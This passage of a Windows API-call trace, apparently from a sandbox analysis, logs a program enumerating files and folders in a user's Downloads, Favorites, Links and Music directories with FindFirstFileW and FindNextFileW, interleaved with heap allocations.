lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bbd5de0, ftCreationTime.dwHighDateTime=0x1d8a472, ftLastAccessTime.dwLowDateTime=0xbf42e820, ftLastAccessTime.dwHighDateTime=0x1d8a6c9, ftLastWriteTime.dwLowDateTime=0xbf42e820, ftLastWriteTime.dwHighDateTime=0x1d8a6c9, nFileSizeHigh=0x0, nFileSizeLow=0x15724, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZSmCHocWuLlaLZ-0Fsrc.ots", cAlternateFileName="ZSMCHO~1.OTS")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f3f3e0, ftCreationTime.dwHighDateTime=0x1d8a67e, ftLastAccessTime.dwLowDateTime=0x8a5bc880, ftLastAccessTime.dwHighDateTime=0x1d8a6d7, ftLastWriteTime.dwLowDateTime=0x8a5bc880, ftLastWriteTime.dwHighDateTime=0x1d8a6d7, nFileSizeHigh=0x0, nFileSizeLow=0x40f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zzDsCcZ.xlsx", cAlternateFileName="ZZDSCC~1.XLS")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f3f3e0, ftCreationTime.dwHighDateTime=0x1d8a67e, ftLastAccessTime.dwLowDateTime=0x8a5bc880, ftLastAccessTime.dwHighDateTime=0x1d8a6d7, ftLastWriteTime.dwLowDateTime=0x8a5bc880, ftLastWriteTime.dwHighDateTime=0x1d8a6d7, nFileSizeHigh=0x0, nFileSizeLow=0x40f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zzDsCcZ.xlsx", cAlternateFileName="ZZDSCC~1.XLS")) returned 0 [0175.535] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.535] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.538] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Downloads\\") returned="Downloads\\" [0175.538] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.538] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.538] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.538] PathFindFileNameW (pszPath="") returned="" [0175.538] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Downloads\\*" (normalized: "c:\\users\\keecfmwgj\\downloads\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.539] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.539] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.539] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0175.539] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.540] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.540] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0175.540] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.540] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.540] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.540] PathFindFileNameW (pszPath="") returned="" [0175.540] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.540] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.540] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fe350, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.540] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0175.540] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0175.540] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0175.540] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0175.541] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0175.541] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.541] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.541] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Links\\") returned="Links\\" [0175.541] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.541] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.541] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.541] PathFindFileNameW (pszPath="") returned="" [0175.541] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\*" (normalized: "c:\\users\\keecfmwgj\\links\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.541] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.541] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.541] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0175.541] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x36e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0175.541] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ab6db0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x5fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0175.541] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0175.541] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0175.542] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.542] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.542] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Local Settings\\") returned="Local Settings\\" [0175.542] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.542] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.542] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.542] PathFindFileNameW (pszPath="") returned="" [0175.542] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Local Settings\\*" (normalized: "c:\\users\\keecfmwgj\\local settings\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0175.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0175.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0175.543] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.543] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0175.543] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.544] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.544] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.544] PathFindFileNameW (pszPath="") returned="" [0175.544] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\*" (normalized: "c:\\users\\keecfmwgj\\music\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98b65310, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98b65310, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.544] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98b65310, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98b65310, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.544] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17112530, ftCreationTime.dwHighDateTime=0x1d8a625, ftLastAccessTime.dwLowDateTime=0x18f9190, ftLastAccessTime.dwHighDateTime=0x1d8a645, ftLastWriteTime.dwLowDateTime=0x18f9190, ftLastWriteTime.dwHighDateTime=0x1d8a645, nFileSizeHigh=0x0, nFileSizeLow=0x175ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7pEW.mp3", cAlternateFileName="")) returned 1 [0175.544] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e80a6a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.544] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1abd4b0, ftCreationTime.dwHighDateTime=0x1d8a3eb, ftLastAccessTime.dwLowDateTime=0x6bfe5650, ftLastAccessTime.dwHighDateTime=0x1d8a457, ftLastWriteTime.dwLowDateTime=0x6bfe5650, ftLastWriteTime.dwHighDateTime=0x1d8a457, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fUhvLY4JeAGwk", cAlternateFileName="FUHVLY~1")) returned 1 [0175.544] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa272c00, ftCreationTime.dwHighDateTime=0x1d8a127, ftLastAccessTime.dwLowDateTime=0x7a4cbaa0, ftLastAccessTime.dwHighDateTime=0x1d8a72f, ftLastWriteTime.dwLowDateTime=0x7a4cbaa0, ftLastWriteTime.dwHighDateTime=0x1d8a72f, nFileSizeHigh=0x0, nFileSizeLow=0x3b93, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oolp hJaohuLco5czCDI.mp3", cAlternateFileName="OOLPHJ~1.MP3")) returned 1 [0175.544] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734c7310, ftCreationTime.dwHighDateTime=0x1d898cc, ftLastAccessTime.dwLowDateTime=0xab57b2a0, ftLastAccessTime.dwHighDateTime=0x1d8a31d, ftLastWriteTime.dwLowDateTime=0xab57b2a0, ftLastWriteTime.dwHighDateTime=0x1d8a31d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pE 0cUon", cAlternateFileName="PE0CUO~1")) returned 1 [0175.545] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x574d19f0, ftCreationTime.dwHighDateTime=0x1d89861, ftLastAccessTime.dwLowDateTime=0x979ccc90, ftLastAccessTime.dwHighDateTime=0x1d8a23d, ftLastWriteTime.dwLowDateTime=0x979ccc90, ftLastWriteTime.dwHighDateTime=0x1d8a23d, nFileSizeHigh=0x0, nFileSizeLow=0x10e2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qxLG6rlRsvYEmXiL.m4a", cAlternateFileName="QXLG6R~1.M4A")) returned 1 [0175.545] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: 